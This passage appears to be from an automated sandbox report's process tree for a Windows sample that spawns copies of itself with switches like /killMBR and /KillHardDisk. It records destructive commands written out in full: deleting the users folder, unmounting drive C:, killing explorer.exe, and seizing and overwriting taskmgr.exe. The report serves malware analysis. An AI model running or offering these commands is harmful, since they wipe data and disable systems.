        PID:7136
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890039.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890039.exe 1699084438
        9⤵
        
        PID:7572
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:8376
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:8844
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /save 1699084438
        6⤵
        
        PID:3912
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /save 1699084438
        7⤵
        Executes dropped EXE
        
        PID:3256
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /protect 1699084438
        6⤵
        
        PID:3964
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /protect 1699084438
        7⤵
        Executes dropped EXE
        
        PID:2936
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe+41641.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe
        8⤵
        
        PID:4680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe 1699084438
        8⤵
        
        PID:700
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe 1699084438
        9⤵
        
        PID:6228
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:7332
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:7484
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe /autoup 1699084438
        10⤵
        
        PID:3904
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe /autoup 1699084438
        11⤵
        
        PID:7036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe /killwindows 1699084438
        10⤵
        
        PID:4076
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe /killwindows 1699084438
        11⤵
        
        PID:11164
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:7648
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:7104
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe /killMBR 1699084438
        10⤵
        
        PID:5920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe /KillHardDisk 1699084438
        10⤵
        
        PID:11896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe /protect 1699084438
        10⤵
        
        PID:5196
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe /protect 1699084438
        11⤵
        
        PID:7652
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe+128429.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900341.exe
        12⤵
        
        PID:12224
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe /autoup 1699084438
        10⤵
        
        PID:11816
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe /autoup 1699084438
        11⤵
        
        PID:11576
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe C:\windows\system32\taskmgr.exe
        10⤵
        
        PID:12840
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe+0172.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe
        8⤵
        
        PID:6852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe 1699084438
        8⤵
        
        PID:7488
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe 1699084438
        9⤵
        
        PID:9204
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe /killwindows 1699084438
        10⤵
        
        PID:5256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe /KillHardDisk 1699084438
        10⤵
        
        PID:11704
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe /KillHardDisk 1699084438
        11⤵
        
        PID:5188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:11900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe /autoup 1699084438
        10⤵
        
        PID:11092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe /killMBR 1699084438
        10⤵
        
        PID:5132
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe /killMBR 1699084438
        11⤵
        
        PID:6516
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe /protect 1699084438
        10⤵
        
        PID:7948
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe /protect 1699084438
        11⤵
        
        PID:7792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe+127906.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900301.exe
        12⤵
        
        PID:7828
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe /autoup 1699084438
        10⤵
        
        PID:7828
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe /autoup 1699084438
        11⤵
        
        PID:12852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe C:\windows\system32\taskmgr.exe
        10⤵
        
        PID:12996
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /save 1699084438
        6⤵
        
        PID:3712
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /save 1699084438
        7⤵
        Executes dropped EXE
        
        PID:2512
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /protect 1699084438
        6⤵
        
        PID:3524
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /protect 1699084438
        7⤵
        Executes dropped EXE
        
        PID:6036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe+710821.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe
        8⤵
        
        PID:6208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe 1699084438
        8⤵
        
        PID:5396
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe 1699084438
        9⤵
        
        PID:2804
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe /autoup 1699084438
        10⤵
        
        PID:9636
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe /autoup 1699084438
        11⤵
        
        PID:4656
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe /killwindows 1699084438
        10⤵
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe /killwindows 1699084438
        11⤵
        
        PID:11444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:12252
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:4792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        12⤵
        
        PID:13016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe /KillHardDisk 1699084438
        10⤵
        
        PID:12060
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe /KillHardDisk 1699084438
        11⤵
        
        PID:4612
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:2952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe /killMBR 1699084438
        10⤵
        
        PID:11588
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe /killMBR 1699084438
        11⤵
        
        PID:7844
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe /protect 1699084438
        10⤵
        
        PID:10224
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe /protect 1699084438
        11⤵
        
        PID:8216
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe+127906.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900371.exe
        12⤵
        
        PID:5132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe /autoup 1699084438
        10⤵
        
        PID:12728
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890037.exe /autoup 1699084438
        11⤵
        
        PID:2012
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe+26671.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890032.exe
        8⤵
        
        PID:8420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890032.exe 1699084438
        8⤵
        
        PID:10560
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /save 1699084438
        6⤵
        
        PID:4868
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /save 1699084438
        7⤵
        
        PID:6612
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:1800
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:6432
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /autoup 1699084438
        6⤵
        
        PID:2916
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /autoup 1699084438
        7⤵
        
        PID:9684
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /killwindows 1699084438
        6⤵
        
        PID:9004
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /killwindows 1699084438
        7⤵
        
        PID:4024
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        8⤵
        
        PID:5476
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        9⤵
        Modifies file permissions
        
        PID:6620
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /KillHardDisk 1699084438
        6⤵
        
        PID:11172
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /KillHardDisk 1699084438
        7⤵
        
        PID:8816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        8⤵
        
        PID:10576
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        8⤵
        
        PID:13032
        
        C:\Windows\system32\mountvol.exe
        
        mountvol c: /d
        9⤵
        
        PID:13616
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /killMBR 1699084438
        6⤵
        
        PID:6016
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /killMBR 1699084438
        7⤵
        
        PID:7004
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /protect 1699084438
        6⤵
        
        PID:6576
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /protect 1699084438
        7⤵
        
        PID:3496
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe+46409.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe
        8⤵
        
        PID:12572
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /autoup 1699084438
        6⤵
        
        PID:5884
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /autoup 1699084438
        7⤵
        
        PID:10396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /save 1699084438
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4416
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /save 1699084438
    3⤵
    PID:3956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /protect 1699084438
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3648
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /protect 1699084438
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2908
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe+53210.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe
      4⤵
      PID:2824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /save 1699084438
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1288
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /save 1699084438
    3⤵
    PID:4252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /protect 1699084438
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4332
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /protect 1699084438
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4584
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe+124706.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe
      4⤵
      PID:880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe 1699084438
      4⤵
      PID:4180
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe 1699084438
        5⤵
        Executes dropped EXE
        
        PID:3688
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /protect 1699084438
        6⤵
        
        PID:4468
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /protect 1699084438
        7⤵
        Executes dropped EXE
        
        PID:2852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe+41641.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe
        8⤵
        
        PID:2584
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe 1699084438
        8⤵
        
        PID:5164
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe 1699084438
        9⤵
        
        PID:6240
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:7588
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:5008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe /killwindows 1699084438
        10⤵
        
        PID:7456
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe /killwindows 1699084438
        11⤵
        
        PID:11484
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:4124
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:10960
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe /autoup 1699084438
        10⤵
        
        PID:9508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe /KillHardDisk 1699084438
        10⤵
        
        PID:11984
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe /KillHardDisk 1699084438
        11⤵
        
        PID:2916
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:12532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe /killMBR 1699084438
        10⤵
        
        PID:11556
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe /killMBR 1699084438
        11⤵
        
        PID:7760
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe /protect 1699084438
        10⤵
        
        PID:5604
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe /protect 1699084438
        11⤵
        
        PID:6500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe+46932.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900144.exe
        12⤵
        
        PID:6192
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe /autoup 1699084438
        10⤵
        
        PID:10916
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe /autoup 1699084438
        11⤵
        
        PID:6360
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe C:\windows\system32\taskmgr.exe
        10⤵
        
        PID:12504
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe+0172.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe
        8⤵
        
        PID:6804
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe 1699084438
        8⤵
        
        PID:7324
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe
        
